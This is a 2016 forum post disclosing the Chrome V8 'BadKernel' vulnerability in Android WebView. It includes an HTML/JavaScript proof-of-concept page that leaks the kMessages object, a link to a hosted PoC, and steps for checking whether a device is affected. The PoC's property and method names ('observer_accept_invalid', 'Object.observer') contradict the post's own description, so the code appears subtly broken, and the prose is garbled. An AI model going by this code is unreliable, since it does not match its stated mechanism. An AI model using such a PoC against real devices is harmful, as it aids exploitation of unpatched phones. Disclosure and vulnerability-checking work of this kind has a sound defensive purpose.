HackerTop
https://hackertop.org/

Google Chrome V8 BadKernel Vulnerability
https://hackertop.org/viewtopic.php?f=11&t=40
Page 1 of 1

Author:  Lyon [ Tue Aug 23, 2016 11:14 am ]
Post subject:  Google Chrome V8 BadKernel Vulnerability

Google V8 JavaScript Engine is Chrome browser for the development of a set of open source JavaScript engine.

The vulnerability is due to the source code in the "observe_accept_invalid" exception type was mistakenly written as "observe_invalid_accept"".

An attacker can use the vulnerability to cause kMessages key object information leakage, the implementation of arbitrary code.

Based on the 4.4.4 Android to 5.1 version of the system WebView controls the development of mobile phone APP are likely to be affected by the vulnerability.


Google Chrome V8 : 3.20 ~ 4.2 Version

Android: 4.4.4 ~ 5.1 Version

Code:
Proof of Concept
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>badkernel</title>
</head>
<script type="text/javascript">
    var kMessages;
    Object.prototype.__defineGetter__("observer_accept_invalid", function(){kMessages=this});
    try{
        Object.observer({},function(){}, 1);
    } catch(e) {
    }
    delete Object.prototype["observer_accept_invalid"];
    alert(kMessages);
</script>

</html>


Or

http://poc.hackertop.org/Android/v8rce_poc.html



If the browser can access the following page, if you can get the kMessages object,

Output object name is vulnerability

If output undefined does't vulnerability.


chrome://version


Refer:

http://www.cnnvd.org.cn/vulnerability/s ... 2016080414

Page 1 of 1 All times are UTC
Powered by phpBB® Forum Software © phpBB Group
https://www.phpbb.com/